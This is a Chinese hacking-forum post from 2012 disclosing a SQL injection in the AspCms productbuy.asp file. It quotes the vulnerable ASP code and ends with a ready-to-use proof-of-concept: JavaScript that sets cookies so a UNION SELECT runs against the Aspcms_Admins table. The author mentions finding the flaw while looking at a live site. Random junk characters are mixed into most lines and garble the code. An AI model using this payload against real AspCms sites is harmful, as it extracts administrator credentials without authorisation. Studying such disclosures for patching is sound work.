好久没上土司了,上来一看发现在删号名单内.....7 {( L% @5 ~ }2 ~' e: l
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。9 ~7 g- O T, p) T. o4 m+ _5 h& g/ V
废话不多说,看代码:
; d0 ]+ x2 g$ }" c& A5 H" Q4 o4 W: E0 o& Q' x( Z
<%
' S. i$ Q: _/ U% A* V7 r
5 Z$ R) {; u$ N& I+ N! J) wif action = "buy" then
) o& v4 Z2 p. @( A
* x5 x1 ^2 g$ ^: E! ~ addOrder()4 p) T$ a* w2 T3 ~4 M7 \. [; b
6 |0 n! a9 y1 c" m1 j7 T% x' R
else
/ P9 j% Z# X6 h! b; c% N5 |8 F1 B* [1 z4 c( W
echoContent(): Y+ v9 ?& `3 z" t% l
- d' N' `* D8 k& W3 ]3 m7 s
end if& u M( \1 J3 h& S
0 D$ C* S4 K( K2 ?9 t
3 a: E4 D: m6 ~7 ^1 X( a" R; B$ |& t! i- @8 \ \. L1 `
……略过
! H& n( }2 s. O6 l. X) D7 ]* R& e) A" x
: S8 ?! x u. t3 I- ?* {
2 b$ ?4 P9 s0 n) N0 l' ySub echoContent()
( e: Z2 L/ ]* j, T: e8 [' h7 B, j2 C8 d' J- o' S+ ]2 p
dim id C5 t: j1 d2 V! M& V1 C, F+ A
1 E/ c E$ b$ \
id=getForm("id","get")
- l! T: v5 J& }; m: E' F( Z
; A" @4 ]1 p0 b% `& W- F : @6 b" o1 f. G* A
6 f5 [* ?) Y4 s5 | if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" / ~! h9 `1 T6 b6 d# u" s
: n. K4 { [* \* W
( f2 }+ N* f+ f% J8 x
$ I& R! ^' H/ @5 a3 A0 k4 A dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
. @8 s2 n) ^5 l) U( O$ ]% n7 E2 d6 K `) v/ x
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
" p! d! z/ z- M" v
( D+ h' _; W A7 c# c Dim templatePath,tempStr* C- V" }+ z0 F: M+ e. M
2 g, F" O1 C, n" J
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
* e, i. N0 q3 c) O/ h
% y% J) j& A! S q% F
* p6 C- ~: h6 S
8 B) x- }" g3 V | I3 L set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1"). z+ N7 J: k3 }; Q% c5 B
( q l% q8 _4 O7 H% U6 M3 N selectproduct=rsObj(0)( l" g8 i9 A- O0 n2 g& l
$ L7 b& f: A, C1 i7 Y& U7 @% s
# W! E s& ]2 Z( G
6 U) y9 d6 ~$ K1 G' ]! g0 g
Dim linkman,gender,phone,mobile,email,qq,address,postcode/ ^' b, b ~3 Z) N" w1 b
7 i0 L9 i- K0 X7 Q
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
. D8 B8 Y. p t& g3 X% h7 z/ V+ J0 N% q' Q) R! J2 F' a3 Q
if rCookie("loginstatus")=1 then
. `0 `/ X3 `2 R1 ~9 d( P& P- z5 I3 ^1 v" N$ @- h( F7 K7 k2 Q, a
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
$ ~, u+ V" @' @* ?0 p* G6 M' {/ p p) q% Q" b$ Z: ?1 k7 F3 I
linkman=rsObj("truename")
/ u1 f( v7 W( H, a; w" L7 X% H# U( o
( G% l( m, k+ T( ^ gender=rsObj("gender")
$ D( L: B3 g9 h! G" ]( @6 D; y6 ^7 U& L7 y& U6 h1 ~+ y+ y; p1 }
phone=rsObj("phone")+ B5 M- ^ O0 @% j+ y+ [
5 b0 `- g, V6 } C. W2 H* d
mobile=rsObj("mobile")
, l( b1 C/ G7 i
8 L' Z$ g& R; G8 p, y email=rsObj("email")
7 A( ?& B# R7 U1 g# T1 d* f) ^8 u/ H7 J. X9 s. t7 L2 q
qq=rsObj("qq")
" R v) C" I! b0 [, D y. J) M# ~/ `6 ?( t/ E
address=rsObj("address")2 _! H- H) `0 F; e; _' _2 s
* k1 s# b) |; J" v+ e
postcode=rsObj("postcode")
3 `4 G% V, p( V" c" s' T/ P* S& y- O* O# K H, d
else
@+ m; W* |! g2 H t0 T, v
4 _: T" M3 s- J( P gender=16 ^+ t7 f: ]1 V' W$ ` ~, X
, L* c% U6 o5 Z end if
k5 l3 s* c* ~3 e% l6 m) y6 \. p' m& N" Y! [
rsObj.close()
) P) W2 ]' N2 k& o8 `, [, a j
: x+ ^7 a. e9 H, | r
K, o* _- c$ F7 u D3 m$ @
1 ~* D! k. |5 z4 E with templateObj
6 ?( X; w% `2 O5 `7 t. R
+ \8 L0 z7 B. ~ ^: J8 A .content=loadFile(templatePath) % u3 I9 o: B& {2 }- s) y3 l
- g* {4 Z: f6 _- N; |
.parseHtml()% b: Y0 C. o( Q+ Z# Z
- c$ q8 H. e n. J .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
7 B$ V; M! m( o" R% f# `7 g6 l! u
$ K c& m, |# U/ g' @6 d .content=replaceStr(.content,"[aspcms:linkman]",linkman)
, r, g) ~0 m2 @3 X. R+ h+ O3 @& T3 z1 B
.content=replaceStr(.content,"[aspcms:gender]",gender) * ~5 f! ]; Q7 `, ]" D" O5 K
9 k; v2 e, C/ E9 A- ^, Y
.content=replaceStr(.content,"[aspcms:phone]",phone) 9 N9 q/ m' o! W3 Y( d& _$ Z, D+ D' o( R) K
/ [1 d8 s; e% a" x. C3 c/ ? .content=replaceStr(.content,"[aspcms:mobile]",mobile) 0 }9 a! W! ]! C$ N @3 M# @
8 ^9 R1 |" t( t( |
.content=replaceStr(.content,"[aspcms:email]",email) * x5 r x: T1 Z, q/ O
7 s* V$ k* m5 m: k1 | .content=replaceStr(.content,"[aspcms:qq]",qq)
; R A! f. \$ u% r* M9 f" d* y" O) v1 Y/ s- S. V" }6 Q
.content=replaceStr(.content,"[aspcms:address]",address)
+ L% }$ h4 b% q2 T+ l
$ K% b- ^, A* S. Z+ X) n .content=replaceStr(.content,"[aspcms:postcode]",postcode) 5 ~& {7 a# M! \6 s' r3 p
% E9 M a( {- i+ e+ t .parseCommon()
! E/ N( L T- l$ ^ B7 _% t6 B7 I- Y( _4 ]
echo .content
5 y8 f% D6 `' Y2 ]( @( T2 v* e0 Q6 a$ C p$ Q8 B. N
end with
- U2 z" I7 K7 u" {9 r
" h% i- p' N& V. N8 |8 S( U/ U set templateobj =nothing : terminateAllObjects
! K7 ]+ V: h# I/ e/ u* P4 f, e4 q$ v, i7 \/ I
End Sub0 ^) t" s7 D3 O7 O9 [! |
漏洞很明显,没啥好说的
, L! D0 X3 X# a; ]) p& Vpoc:7 |) D6 }" S4 C
( e4 |8 v/ u( l; K1 t5 \
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子 C* o: d0 I# G+ l! l/ J
* H2 T+ E" t* l' y6 h |
发表于 2012-12-27 08:35:05
收藏
支持
反对